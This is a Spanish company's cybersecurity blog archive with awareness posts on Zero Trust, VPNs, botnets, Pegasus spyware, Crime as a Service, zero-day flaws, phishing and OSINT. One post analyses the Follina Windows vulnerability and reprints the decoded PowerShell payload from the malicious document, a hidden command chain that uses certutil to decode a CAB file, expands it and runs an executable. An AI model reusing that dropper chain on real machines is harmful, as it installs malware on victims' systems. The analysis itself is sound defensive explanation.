SEGURIDAD EN RED LOCAL: ZERO TRUST SECURITY

SEGURIDAD EN RED LOCAL: ZERO TRUST SECURITY

Normalmente, en los hogares y en las oficinas tenemos una red local donde conectamos todos nuestros dispositivos: ordenadores, móviles, impresoras, IoT, NAS, etc.

Gracias a esta red local podemos interactuar con nuestros dispositivos sin exponerlos a Internet, por lo que pueden pensar que es un perímetro seguro el cual podemos confiar en los dispositivos que estén conectados a la red porque el acceso a la red está controlado, pero no es así.

 

Vamos a poner un ejemplo con una oficina: los equipos que tienen acceso a la red pueden usar la impresora, acceder a los archivos del servidor, usar la aplicación de la oficina, etc.

Cualquier agente externo como un hacker o un empleado descontento puede tener acceso a todo en cuanto haya ganado acceso a la red local y causar problemas. Por eso en estos últimos años, se ha dejado de pensar en el concepto de un perímetro seguro a una arquitectura Zero Trust.

 

¿Qué es Zero Trust?

Zero Trust es un modelo de seguridad informática con una premisa: “No confíes nunca, comprueba siempre”. Esta arquitectura necesita una verificación de identidad por cada usuario/dispositivo que quiera acceder a la red y realizar alguna operación dentro de ella.

Imaginémonos que la red de la oficina o de la casa fuera un edificio. Normalmente para proteger el edificio se ponen guardias en las entradas que son los que permiten el acceso a las personas (Un perímetro seguro), pero una vez dentro del edificio tienen total libertad y acceso a todos los recursos. Si un guardia deja pasar a algún actor malintencionado, puede abusar de sus privilegios dentro del perímetro para causar daño.

Una arquitectura Zero Trust no confía en nadie, ni de fuera ni de dentro del edificio. Cada vez que quieras entrar al edificio, ir a alguna habitación, acceder a algún recurso del edificio habrá un guarda que comprobará que eres tú y que tienes los permisos necesarios para realizar cualquier acción. Además, todas esas actividades y solicitudes quedan registradas, por lo que un acceso indebido o un intento de explotación por un agente malintencionado se puede detectar y encontrar su origen.

 

Fundamentos de la Seguridad Zero Trust

La seguridad Zero Trust se basa en estos fundamentos:

Asumir que todo es hostil

Este es el principio fundamental del Zero Trust: Por defecto, todo tráfico y actividad es hostil hasta que se demuestre lo contrario. Para demostrar que el tráfico no es malicioso y que viene de una fuente confiable, la fuente debe confirmar su identidad y de que esta identidad tiene los permisos suficientes para la operación.

Identificación y autorización

Para poder acceder a la red y a los recursos, debes demostrar que eres tú y que tienes permisos para realizar una acción. Esto se consigue a través de Identity and Access Managers (IAM). Un IAM es un recurso centralizado que ofrece servicios de identificación y de resolución de accesos. Antes de cualquier actividad, el usuario se identificará al IAM para demostrar que es un usuario confiable y cada vez que realiza una acción, el IAM procesa la acción y permitirá/denegará la acción dependiendo de los permisos del usuario.

Principio del mínimo privilegio

El principio de mínimo privilegio define que a cada usuario o proceso se le concede sólo los privilegios esenciales para realizar su función.Por ejemplo, un empleado de ventas tendrá acceso a los recursos de ventas, pero no a los recursos de contabilidad o de IT. Si un usuario o proceso es comprometido, limitará su capacidad y reducirá la superficie de ataque.

Logging y monitoreo

Todo movimiento y actividad queda registrado en el sistema. Gracias a esto, se puede hacer tareas de monitoreo para detectar y mitigar posibles actuaciones malintencionadas además de poder determinar su procedencia y alcance y ganar inteligencia para reforzar la seguridad de la red.

 

Ventajas de la Seguridad Zero Trust

Una infraestructura segura para el teletrabajo

Las organizaciones pueden desplegar servicios y recursos alcanzables desde internet pero solo accesibles para los miembros de la organización. Esto ayuda a los usuarios a poder realizar sus actividades desde casa o cualquier lado de forma segura sin exponer los servicios y recursos a internet y que cualquiera pueda acceder.

Mayor seguridad y herramientas para mitigar ataques

El departamento informático contaría con herramientas centralizadas para poder detectar ataques, definir políticas de seguridad, conceder/denegar permisos, rastrear actividades sospechosas, definir alarmas y avisos de acciones sospechosas, reportes más detallados, etc.

Mayor visibilidad de los recursos

Gracias al enfoque de Zero Trust de no confiar en nadie, la infraestructura es consciente de todos los recursos que se encuentran conectados, por lo que la organización tiene bien listados sus recursos y los detalles de estos . Gracias a esta visibilidad la organización es consciente de todos los recursos que posee y facilita las tareas de inventario y la simplificación de administración de IT.

 

 

Publicado el 29 de Julio de 2022
Por Alberto López
Departamento de Ciberseguridad

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.

VPN

VPN

¿Qué es una VPN?

Una VPN (Virtual Private Network, en inglés) es una herramienta que establece una conexión de red segura cuando navegamos por internet. La VPN encripta todo nuestro tráfico que viaja a través de internet haciendo más difícil que un tercer actor robe nuestra información o rastree nuestra actividad.

 

¿Cómo funciona?

Cuando establecemos una conexión VPN lo que hacemos es realizar una conexión remota con el servidor de la VPN. Para ello, primero, nos autentificamos y el servidor utiliza una serie de protocolos para cifrar nuestros datos. Desde este instante todos los paquetes que enviamos irán cifrados en otro paquete externo mediante un proceso de encapsulación. Cuando los paquetes llegan a la VPN, esta elimina el paquete externo mediante un proceso de descifrado para acceder a los datos que contiene.

A partir de este momento el servidor remoto de la VPN se convierte en el origen de nuestros datos enviando nuestras peticiones. Cuando el servidor web responde a nuestra petición la VPN se encarga de cifrar los datos y enviárnoslo de nuevo.

 

Tipos de VPN

Los tipos de VPN que nos podemos encontrar son:

  • VPNs de acceso remoto: son utilizadas por las empresas para establecer una conexión segura entre los recursos de la empresa y los dispositivos personales o de la compañía de los empleados. Una vez conectado los empleados pueden acceder a la información de la empresa sin tener que estar físicamente dentro de la red empresarial.
  • VPNs punto a punto: ideales para grandes compañías que desean compartir información entre distintos usuarios situados en localizaciones diferentes. Pueden existir a su vez dos subtipos.
    • Intranet punto a punto: son útiles cuanto una empresa tiene oficinas en distintas localizaciones y se desean compartir información entre ambas.
    • Extranet punto a punto: similar a la anterior pero esta vez cuando se desean conectar intranets entre empresas distintas.
  • Basadas en clientes: permiten al usuario conectarse a una red remota mediante una aplicación web. Por seguridad esta aplicación usa un método de autenticación. Útiles cuando se desea trabajar desde una red pública.

 

Beneficios de usar una VPN

Algunos de los beneficios más destacados que puede aportar el uso de una VPN son:

  • Encriptación Segura: toda la información que mandamos a través de la VPN es encriptada. Para poder desencriptarla se necesita una clave. Sin la clave no nos pueden robar la información ya que mediante ataques de fuerza bruta llevaría millones de años desencriptar la información.
  • Ocultar nuestra localización: en una VPN el servidor actúa como un proxy a internet. Dado que este servidor puede encontrarse en una localización distinta a la nuestra y este actúa como origen de los datos es imposible determinar a ciencia cierta nuestra localización.
  • Saltarse restricciones geográficas: determinado contenido en internet es solo accesible para ciertas partes del mundo. Mediante VPN spoofing podríamos cambiarnos a un servidor ubicado en otra localización para poder acceder a ese contenido.

 

 

Publicado el 29 de Julio de 2022
Por Francisco Javier García
Departamento de Ciberseguridad

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.

VULNERABILIDAD 0DAY DESCUBIERTA EN WINDOWS

VULNERABILIDAD 0DAY DESCUBIERTA EN WINDOWS (CVE-2022-30190 «FOLLINA»)

Nota 17/06/2022: Microsoft ya ha subido un parche para la vulnerabilidad CVE-2022-30190 “Follina” dentro de la actualización de Junio de Windows, Se recomienda actualizar los equipos cuanto antes.

En los últimos días de mayo de 2022, la comunidad de ciberseguridad ha hecho eco de una nueva vulnerabilidad que afecta al sistema operativo Windows y el paquete de ofimática Microsoft Office. Esta nueva vulnerabilidad CVE-2022-30190, bautizada como “Follina” es capaz de ejecutar código arbitrario en las últimas versiones de Windows y Office con solo un click o incluso con 0 clicks.

Todo empezó por un Tweet del grupo de investigación en Ciberseguridad nao_sec. Este grupo japonés estaba analizando un documento infectado que había sido subido en el portal VirusTotal (Un servicio gratuito que analiza archivos y URLs en busca de malware).

Como dice el tweet, dentro del documento .doc hay una referencia a un link externo a una URL que carga un archivo HTML y este es capaz de ejecutar código arbitrario en PowerShell.

El documento hace uso de una utilidad en Word que carga una plantilla en remoto y lo muestra en el documento. Esta utilidad lo que hace es cargar un archivo HTML que define la plantilla del documento alojado en un servidor remoto.

El actor hace una referencia a una URL donde tiene alojado un archivo HTML donde podemos destacar dos cosas:

  • Hay un bloque de comentarios donde hay un montón de “A”s, aún no se sabe a ciencia cierta por qué es necesario pero esta entrada del blog de Bill Demirkapi indica que hay un Buffer de un tamaño fijo en una función que procesa el HTML, por lo que si el archivo es menor que 4096 bytes, no es capaz de iniciar el payload. Estas “A”s funcionan como relleno para que el archivo pase ese límite.
  • Vemos que dentro del HTML, hay una referencia a una URI con un esquema que hace referencia al protocolo ms-msdt utilizado por el sistema operativo para ejecutar el solucionador de problemas de windows.

(Nota: en vez de poner http:// o https:// como en las URIs que todos conocemos, en esta URI contiene ms-msdt:/).

El esquema ms-msdt hace referencia al paquete PCWDiagnostics, más conocido como el “Solucionador de problemas” de Windows que se suele utilizar cuando no funciona el sonido o el WiFi..

Esa URI lanza el programa con una serie de parámetros. En uno de los parámetros vemos que usa sintaxis de PowerShell, donde se encuentra el payload codificado en Base64. Si lo decodificamos podemos ver lo que contiene:

$cmd = «c:\windows\system32\cmd.exe»;
Start-Process $cmd -windowstyle hidden -ArgumentList «/c taskkill /f /im msdt.exe»;
Start-Process $cmd -windowstyle hidden -ArgumentList «/c cd C:\users\public\&&for /r %temp%
%i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil –
decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe»
;

Estos comandos hacen lo siguiente:

  • Abre una ventana oculta de cmd.exe.
    • Mata al proceso msdt.exe.
    • Hace un bucle de los archivos que se encuentra dentro de un archivo .rar buscando una cadena en Base64 que codifica un archivo CAB.
      • Guarda el archivo CAB codificado en Base64 como 1.t.
      • Decodifica el archivo CAB codificado en Base64 y lo guarda como 1.c.
      • Descomprime el archivo CAB 1.c en el directorio.
      • Y por último ejecuta rgb.exe que seguramente se encontraría dentro del archivo CAB.

(Nota: un archivo CAB (.cab) se refiere a un archivo Windows Cabinet cuyo contenido tiene datos comprimidos, parecido a los ZIP. en este caso el archivo CAB tenía dentro un archivo ejecutable llamado rgb.exe).

En resumen, un documento aparentemente inofensivo sería capaz de ejecutar código arbitrario en el equipo de la víctima, aunque éste lo vea en vista protegida. Y para empeorar las cosas, si en vez de un archivo de word .doc se trata de un archivo de Formato de Texto Enriquecido .rtf simplemente con ver en archivo dentro del explorador de Windows es capaz de ejecutar código arbitrario sin ningún click.

En esta prueba de concepto publicada por Benjamin Delpy podemos ver cómo es explotada esta vulnerabilidad. Nada más abrir el archivo .doc con las últimas versiones de Windows y Microsoft Office, podemos ver cómo se abre la ventana del solucionador de problemas y cómo después aparece la calculadora de Windows que ha sido lanzada por el payload.

Aún sin parche publicado por la gente de Microsoft, la únicas formas de mitigar este ataque es deshabilitar el protocolo MSDT como indican en esta publicación de Microsoft..

 

 

Esta vulnerabilidad ya catalogada como 0day afecta a las últimas versiones de Office y de Windows, por lo que en estos días se esperan una oleada de ataques por correo electrónico y otros medios utilizando estas técnicas, por lo que hay que tomar aún más precauciones con los mensajes que recibimos.

Referencias:

 

 

 

Publicado el 24 de Junio de 2022
Por Alberto López
Departamento de Ciberseguridad

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.

BOTNET

BOTNET

¿Qué es una botnet?

Una botnet es un conjunto de dispositivos conectados a través de internet que han sido infectados por algún tipo de malware y reciben órdenes por parte de un tercer actor. Estos dispositivos se conocen generalmente como ‘bots’ o ‘zombies’ y son coordinados de forma remota por un ciberdelincuente o bot herder para realizar ataques a gran escala. Cualquier dispositivo que esté conectado a la red ya sea ordenadores, routers, dispositivos IoT pueden llegar a formar parte de esta red.

 

Arquitectura de una red botnet

Generalmente la estructura de una red botnet se puede lograr mediante tres aproximaciones.

Modelo Cliente-Servidor

Las tareas que realizan los dispositivos infectados son dirigidas desde un servidor central conocido como C&C (Command & Control) y se comunican mediante protocolos como IRC ( Internal Relay Chat).

Modelo Proxy

Con el fin de dificultar la tarea de encontrar el servido C&C, se establece una serie de máquinas intermediarias o proxies. Ahora los clientes en lugar de comunicarse directamente con el servidor C&C lo hacen a través de los proxies y estos con el servidor C&C.

Modelo P2P

Esta es una aproximación descentralizada en la que los dispositivos infectados actúan tanto como clientes como C&C. Los comandos se propagan de bot a bot y para mantener el control, el bot Herder solo necesita tener contacto con cualquier máquina infecta. Este modelo es la evolución de las anteriores haciendo más difícil tumbar la botnet.

 

¿Cómo se infectan los equipos?

Existen distintos métodos de infección, entre ellos:

  • Troyanos.
  • Vulnerabilidades de día cero.
  • Configuraciones inseguras.

 

¿Cuál es el objetivo de una botnet?

Como cualquier acto de ciberdelincuencia, su finalidad es la de obtener algún tipo de beneficio económico. Este se puede lograr a través de diferentes caminos, los más comunes son:

  • Ataques de denegación de servicio o DDoS: este ataque se basa en la saturación de algún tipo de servicio, como una página web, hasta el punto de que deje de funcionar. Para ello utilizan un número elevado de estos bots de manera que accedan de forma simultánea al servicio hasta el punto de que colapsen el servicio.
  • Envío de spam: envío masivo de correos fraudulentos con el fin de realizar estafas de tipo phising o distribuir malware.
  • Venta y alquiler de la botnet: otra opción como viene siendo cada vez más común entre los delincuentes es vender un servicio. Su intención es vender estas redes a terceros que carecen de conocimientos para crearlas pero que desean realizar este tipo de ataque contra alguna entidad.
  • Minado de criptomonedas:  el minado de criptomonedas es un proceso que requiere una gran cantidad de recursos hardware. Esto supone un coste elevado, pero existe una opción mucho menos costosa que es utilizar la red botnet. De esta forma los recursos utilizados para minar criptomonedas son los de la red zombie en lugar de los suyos, aumentando los beneficios de esta forma.

¿Forma mi empresa parte de una botnet?

A través de incibe podemos encontrar una herramienta para comprobar si algún dispositivo que este conectado a nuestra red forma parte de alguna botnet. Su funcionamiento se base en identificar si la dirección IP pública de la empresa forma parte de alguna red botnet. La herramienta se puede encontrar en el siguiente enlace: https://www.incibe.es/protege-tu-empresa/herramientas/servicio-antibotnet.

 

 

Publicado el 24 de Junio de 2022
Por Francisco Javier García
Departamento de Ciberseguridad

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.

PEGASUS: ALCANCE

PEGASUS: ALCANCE

En estos últimos días habrás escuchado en las noticias sobre Pegasus, el producto estrella de la empresa israelí NSO Group. Este spyware capaz de recopilar información de sus víctimas casi sin dejar rastro se descubrió en agosto del  2016 por Citizen Lab, este malware se ha estado usando y comercializando desde el 2012.

Pero, ¿Cómo son capaces de infectar los móviles? Hemos analizado un manual de la propia plataforma Pegasus. Aunque el manual sea probablemente del año 2012, el malware a día de hoy puede ser igual o más potente.

 

¿De qué es capaz Pegasus?

Pegasus es capaz de infectar dispositivos basados en Android, iOS, BlackBerry y Symbian (aunque estos dos últimos es probable que ya no lo soporten en la actualidad).

Este software es capaz de:

  • Extraer contactos, mensajes, emails, fotos, archivos, localizaciones, contraseñas, etc.
  • Interceptar llamadas y geolocalizar a la víctima.
  • Un consumo mínimo de los recursos del dispositivo para ser totalmente transparente a la víctima.
  • Apenas deja rastro en el dispositivo.
  • Mecanismo de autodestrucción en caso de riesgo.

La recolección de datos lo podemos dividir en 4 categorías:

  • Extracción de datos existente en la memoria del dispositivo.
  • Monitorización pasiva de nueva información que recibe el móvil.
  • Recopilación activa mediante la activación de la cámara, micrófono, GPS y otros elementos para capturar información en tiempo real.
  • Recolección basado en eventos con escenarios previamente definidos para mandar datos de forma automática cuando se cumple las condiciones de dichos escenarios con escenarios.

Vectores de ataque

Los ataques se pueden realizar una vez que se conoce el número de teléfono de la víctima, a partir de ahí podemos diferenciar dos modalidades de infección que vamos a categorizar por el número de pasos que debe seguir la víctima para que llegue a una instalación exitosa en el dispositivo de la víctima:

Infecciones de 1 click

Se manda a la víctima un enlace con algún mensaje creado por ingeniería social para que la víctima haga click en en enlace. Una vez que acceda al enlace el malware se instala en el terminal sin ninguna acción más de la víctima. Estos mensajes suelen ser SMS, correos o mensajes que se hacen pasar por bancos, aplicaciones, plataformas que use la víctima, etc.
Infecciones de 0 click

Este tipo de ataques son muchos más sofisticados. Hacen uso de vulnerabilidades 0-day (Vulnerabilidades no conocidas en la última versión del software que aún no han sido parcheadas) para infectar a la víctima, y para ello solo necesitan el número de teléfono de la víctima.

Se ha descubierto que usaban vulnerabilidades no parcheadas de aplicaciones tan utilizadas como WhatsApp e iMessage capaces de infectar dispositivos sin ninguna interacción de la víctima y sobre todo sin ningún conocimiento de la víctima sobre ello.

 

Infraestructura de la aplicación

Una vez que infectada a la víctima o víctimas, los agentes pueden acceder a todo tipo de recursos del dispositivo de la víctima en una interfaz gráfica.

Para mantener esta plataforma de espionaje, NSO Group puede entrenar y formar a los clientes en un programa de 15 semanas. Puede parecer mucho pero para el tamaño de la infraestructura que utiliza la aplicación es bastante rápido.

Publicado el 27 de Mayo de 2022
Por Alberto López
Departamento de Ciberseguridad

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.

PEGASUS: ORIGEN

PEGASUS: ORIGEN

Orígenes

Es posible que estas últimas semanas hayas oído hablar del software Pegasus. Pegasus es un spyware desarrollado por la empresa israelí NSO Group Technologies, sus orígenes se encuentran en un grupo de ex miembros del cuerpo de inteligencia israelí. Se describen como una empresa que desarrolla software para combatir el crimen y el terrorismo, pero veremos como la práctica difiere de la teoría. Aunque es una empresa privada, está estrechamente relacionada con el gobierno israelí, el cual califica a Pegasus como un arma y cualquier exportación del arma debe ser aprobada por el gobierno previamente.

 

A grandes rasgos Pegasus es un malware que recopila información de un dispositivo, en este caso un teléfono móvil, y se lo transmite a una entidad externa sin el conocimiento o consentimiento de la víctima, aprovechando vulnerabilidades del sistema operativo. Es capaz de rastrear localizaciones, enviar y recibir mensajes o recopilar fotos entre otras muchas cosas. Es un software muy sofisticado que no deja rastros.

 

Casos de Espionaje

A partir de que el gobierno israelí concediera licencias para exportarla a gobiernos extranjeros, nunca a entidades privadas, se ha estado usando la herramienta por terceros. Uno de los primeros usos que se conocen fue para espiar a Joaquim Guzmán conocido como “El Chapo” en el 2011 por parte del gobierno mejicano.

 

En 2016 se descubrió por primera vez el uso de la herramienta, por parte de Lookout y Citizen Lab, cuando los Emiratos Árabes Unidos lo utilizaron para atacar al activista Ahmed Mansoor. En aquel momento Mansoor recibió varios mensajes de texto con un enlace a información sobre torturas a prisioneros por parte de este país. Este primer ataque fue realizado explotando vulnerabilidades de un móvil con sistema iOS, más tarde se descubrió que el software también había sido instalado en sistemas Android.

Desde entonces ha seguido una larga ristra de usuarios de la herramienta desde países africanos como Ghana o Marruecos, occidentales como Hungría o de oriente medio como Arabia Saudí o Emiratos Árabes Unidos.

Obviamente esta información no se sabe a ciencia cierta ya que todo lo que rodea a casos de espionaje se encuentra bastante opaco y no se puede determinar con exactitud. Lo que sí sabemos es que entre sus víctimas podemos encontrar grupos terroristas, narcotraficantes, pero principalmente; presidentes, ministros o activistas en favor de los derechos humanos que van en contra de determinados países con regímenes autocráticos. Presidentes como el de Francia o el de España han sido víctimas, esto deja en evidencia a los servicios de inteligencia por parte de estos países, así como demuestra lo difícil que es detectar este spyware.

Uno viendo todos estos casos se podría preguntar si uno mismo puede haber sido víctima, pero es poco probable ya que adquirir esta herramienta vendría a costar unos 500.000$ o incluso llegar hasta los millones de dólares. Es por esto que están enfocadas a víctimas muy concretas, aun así, existen herramientas que nos permiten comprobar si nuestro móvil ha sido infectado como MVT (Mobile Verification Toolkit) desarrollada por Amnistía Internacional.

 

Publicado el 27 de Mayo de 2022
Por Francisco Javier García
Departamento de Ciberseguridad

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.

Crime as a Service (CaaS) ¿Tan fácil es comprometer una empresa?

Crime as a Service (CaaS) ¿Tan fácil es comprometer una empresa?

Últimamente los negocios de casi todos los sectores están ofreciendo sus productos y servicios con el modelo “As a Service”: ofrecer algo de valor como un servicio de suscripción el cual el cliente puede controlar y adaptar el servicio desde una interfaz.Muchos sectores ya cuentan con su modelo “as a service”: desde el software y las TIC de donde nació este modelo hasta coches, seguros, banca, comida, multimedia, etc. Y no solo los negocios están adaptándose a este modelo, también los cibercriminales ofrecen sus servicios a precios bastante asequibles. Estos servicios de ataques dirigidos a quien quieras se conoce como Crime as a Service (CaaS).

 

¿Qué es el Crime as a Service?

El Crime as a Service (CaaS) ofrece unos ataques prefabricados (Ransomware, DDoS, phising, etc.) que el usuario puede controlar desde una interfaz o con unas instrucciones muy sencillas, sin que este necesite algún tipo de conocimiento o formación sobre ciberseguridad y hacking.

Los grupos de criminales han pasado de realizar ellos los ataques a empresas específicas para ganar dinero a desarrollar herramientas y servicios de hacking que se venden o alquilan a terceros, ya sea por tarifa plana o con una parte de los beneficios que consiga el cliente con su ataque.

La parte más preocupante es lo accesible y barato que es este tipo de servicios: se han encontrado kits que pueden ser comprados por tan solo 175 dólares.

Algunos tipos de CasS son los siguientes:

  • Ransomware as a Service (RaaS): Los grupos criminales desarrollan un ransomware (software malicioso que encripta los archivos al usuario y puede pedir un rescate a cambio de desencriptarlos) que puede ser dirigido a una persona u organización. Este tipo de servicios es uno de los más comunes y los que han tenido más éxito.

Ransomware vendido como servicio por el grupo REvil

 

  • DDoS as a Service (DaaS): Un DDoS (Distributed Denial of Service) es un ataque que intenta denegar el acceso a un servicio o recurso mediante la saturación de solicitudes al servicio. Este tipo de ataques requiere una red bastante extensa de ordenadores (normalmente conocido como botnet) a las órdenes del criminal.

 

El delincuente puede poner en alquiler parte de la potencia de la botnet para que el cliente pueda realizar un DDoS a la víctima que desee.

Existen muchos más servicios: kits para phising, kits de malware, kits de exploits, Research as a Service, call centers, …

 

¿Cómo protegernos?

Algunas recomendaciones para evitar este tipo de amenazas son los siguientes:

  • Formar al personal contra los ataques de phishing y el “Social Engineering”.
  • Realizar auditorías de seguridad y parchear las vulnerabilidades encontradas en la auditoría.
  • Crear planes de contingencia y definir una respuesta a los incidentes que puedan ocurrir derivado de este tipo de ataques.

 

Publicado el 29 de Abril de 2022
Por Alberto López
Departamento de Ciberseguridad

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.

VULNERABILIDADES ZERO DAY

VULNERABILIDADES ZERO DAY

Todos sabemos lo importante que es proteger nuestros equipos informáticos ante cualquier amenaza informática, es por ello que contamos con numerosas herramientas para llevar estas tareas a cabo. Pero que sucede si existe algún tipo de vulnerabilidad en nuestro sistema ante la que todavía no existe ninguna solución. Este tipo de vulnerabilidad se le conoce como zero day (día cero) y están relacionadas con los ataques zero day.

 

¿Qué son?

Son un tipo de vulnerabilidad que acaba de ser descubierta recientemente y por lo tanto no existe parche que las solucione. Por tanto, si nuestro sistema cuenta con dicha vulnerabilidad corremos el peligro de ser víctimas de un ataque de tipo zero day si el atacante ha encontrado el fallo antes que el desarrollador. Estas vulnerabilidades se encuentran en sistemas operativos, aplicaciones, etc; que acaban de salir al mercado o son introducidas mediante alguna actualización.

Son explotadas por los ciberdelincuentes que pasan horas investigando la estructura compleja de los programas con el fin de encontrar ese fallo en el código. Cuando descubren alguna vulnerabilidad se inicia una carrera en la que el ciberdelincuentes intentará lanzar el ataque antes de que los desarrolladores la detecten y lancen la solución. Sus objetivos suelen ser las empresas, organizaciones o instituciones con el fin de sacar algún beneficio económico.

 

Línea de Tiempo de Vulnerabilidades Zero Day

 

 

¿Cómo protegernos?

Como ya hemos visto no existe un parche para este tipo de ataques, pero si hay unas pautas que podemos llevar a cabo para proteger nuestra seguridad y privacidad ante este tipo de amenazas y limitar en la medida de lo posible estos ataques hasta que se encuentre la solución.

En primer lugar, es importante tener todas nuestras herramientas de protección activadas. Además, es importantísimo mantener el antivirus actualizado, así como nuestro sistema operativo. Hay que recordar que las actualizaciones no son más que parches de seguridad que solucionan errores, cierran brechas y vulnerabilidades que acaban de ser descubierta.

 

 

Publicado el 29 de Abril de 2022
Por Francisco Javier García
Departamento de Ciberseguridad

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.

TODO LO QUE NECESITAS SABER ACERCA DEL PHISHING

TODO LO QUE NECESITAS SABER ACERCA DEL PHISHING

¿Alguna vez has recibido un correo electrónico de alguna red social para que cambies tu contraseña o has recibido un SMS de tu banco para que cambies las credenciales de tu banca electrónica por una filtración de datos? ¡Precaución! Podrían tratarse de fraudes electrónicos o cómo comúnmente se conocen, “phishing”.

En 2021 se registró un incremento del 7.3% de este tipo de ataques, precedido de un incremento previo durante el brote de COVID-19. Según un estudio de Verizon se cree que el 25% de filtraciones de datos en empresas se debe a este tipo de ataques. El 96% de ataques se realizan vía correo electrónico, seguido por un 3% realizado a través de páginas maliciosas y un 1% a través del móvil.

 

¿Qué es phishing?

El phishing es un fraude electrónico en el que el atacante se hace pasar por una persona legítima o entidad para persuadir a la víctima para que haga clic en un enlace, se descargue un archivo adjunto, envíe información sensible o incluso realice un pago.

Algunos tipos de phishing más comunes son:

  • Phishing por correo electrónico: el más común, se trata de un correo fraudulento que incluyen archivos adjuntos infectados o enlaces que nos redirigen a algún tipo de web maliciosa.
  • Phishing por sitio web: páginas web idénticas a las originales, son copias a páginas en las que confiamos (Twitter, Paypal, Netflix, …) y que el atacante utiliza para robarnos los datos.
  • Smishing: phishing mediante SMS.
  • Vishing: phishing a través de llamada telefónica.

 

¿Cómo prevenimos ser víctimas de phishing?

No existe una fórmula que garantice al 100% evitar el phishing, pero si existen algunos tips que nos pueden servir de gran ayuda.

  • Sea precavido: sospeche de cualquier tipo do correo relacionado con nuestra información sensible y asegúrate antes de descargar algún archivo o hacer clic en cualquier enlace.
  • El contenido del mensaje es sospechoso: Normalmente suelen pasarse por un banco, red social o plataforma de pago. En el mensaje incluyen palabras como urgente, importante o brecha de seguridad, con el fin de asustar a la víctima para que rápidamente sin pensar haga clic en el enlace y que posteriormente introduzca sus datos personales.
  • Mala redacción: normalmente suelen incluir en el mensaje fallos gramaticales (no se incluyen tildes), fallos semánticos o frases mal construidas.
  • Destinatario genérico: el correo no suele ir dirigido a una persona concreta, sino que utilizan expresiones genéricas como “estimado cliente” o “amigo”.
  • Enlaces extraños: normalmente el atacante envía un enlace que nos llevará a una copia de la página original. Para prevenir esto comprobar que el enlace pertenece a la página legitima situando el cursor encima. Una buena práctica es siempre acceder a la página oficial a través del navegador y nunca haciendo clic en los enlaces.

  • Remitente sospechoso: comprobar que la dirección de correo del remitente tiene coherencia con el mensaje. Por ejemplo, si recibimos un mensaje del banco Santander comprobar que la dirección de correo electrónico tiene palabras como @santander.com y no @rsmith34.

 

¿Qué hacer si creemos haber sido víctimas?

Si recibimos un correo que pensamos que puede tratarse de un ataque de phishing, simplemente lo ignoraremos. En el caso de que creamos que podemos haber sido víctimas de un ataque de phishing, lo que debemos hacer es.

  1. Escanear el dispositivo utilizando un antivirus.
  2. Borrar cualquier tipo de archivo que nos hayamos descargado.
  3. Cambiar nuestras contraseñas a la mayor brevedad posible.
  4. Activar la autenticación en dos factores.
  5. Comunicarnos con el banco para cancelar cualquier pago no autorizado.
  6. Recopilar la información y denunciarlo ante las Fuerzas y cuerpos de Seguridad.

 

 

Publicado el 25 de Marzo de 2022
Por Francisco Javier García
Departamento de Ciberseguridad

¿Te interesa lo que has leído?

GRUPO DATA somos un grupo de empresas, expertos y profesionales en Cumplimiento Normativo, Formación y Seguros.

¿QUÉ SABEN DE TÍ? OSINT Y FUENTES ABIERTAS

¿QUÉ SABEN DE TÍ? OSINT Y FUENTES ABIERTAS

Seguro que estos meses habrás visto muchas noticias sobre filtraciones de datos o “data breaches” de grandes empresas, plataformas web y  gobiernos: Samsung, NVIDIA, NHS, Twitch, LinkedIn, y un largo etcétera.

Ya sabemos que una filtración de datos de esta escala puede ser un golpe muy duro a una organización, llegando a ser la causa de su disolución. Pero, ¿Esto me puede afectar a mí como usuario? ¿Es tan peligroso que se filtren los datos de un servicio que utilizo? En resumen: Sí.

Y si sumamos los datos que puedes publicar voluntariamente a internet (dónde trabajas y tu puesto en LinkedIn, una foto de tu parque favorito en Instagram, el nombre de tus padres en Facebook, …) dejas a vista de todo el mundo un perfil bastante detallado sobre tí.

Y esto no es nada nuevo, desde el nacimiento de las redes sociales se ha explotado esto a diferentes escalas: desde el “hacker” que recopila toda la información de una empresa hasta uno mismo para ver cuando cumplía años tu amigo.

 

¿Qué es OSINT?

Estas técnicas de obtención de datos y reconocimiento en internet tienen un nombre. La “Inteligencia de fuentes abiertas” o más conocido por sus siglas en inglés OSINT (Open Source INTelligence) da nombre a una serie de metodologías de obtención, análisis y conclusiones a partir de información que se encuentra público a cualquier persona (ya sea de un modo legítimo o clandestino).

En otras palabras, OSINT se aplica para conseguir todo tipo de información sobre una empresa, organización o persona a partir de buscadores como google, analizarlos y poder sacar conclusiones como por ejemplo comportamiento de una persona o cómo ganar acceso a una infraestructura.

Esta arma de doble filo se utiliza en multitud de ámbitos: una empresa que quiere saber cómo es la nueva incorporación de la plantilla, investigación de delincuentes y prevención de ataques, suplantación de identidad y demás actos ilícitos, etc.

 

¿Qué saben de mí?

Vamos a enfocarnos sobre una persona. ¿Qué puede saber de mí? pues vamos a hacer unos cuantos ejercicios para saberlo.

El primero es muy fácil, busca en google tu nombre o tu “nombre de usuario” que sueles utilizar en redes sociales o servicios y dedícale 5 minutos a buscar qué aparece. Depende de cómo te has ido comportando en internet y el rastro que ha dejado puede pasar dos cosas: que apenas haya datos sobre tí o que los primeros resultados sea tu perfil de cualquier red social junto con una foto tuya.

Vamos a subir un nivel más: vas a buscar qué contraseñas tienes publicadas en internet. La página haveibeenpwned.com busca entre diferentes “data breaches” como los que hemos hablado al principio de este artículo si aparece tu correo electrónico junto con diferentes datos vinculados a este: contraseñas, direcciones, datos identificativos, tarjetas de crédito y más.

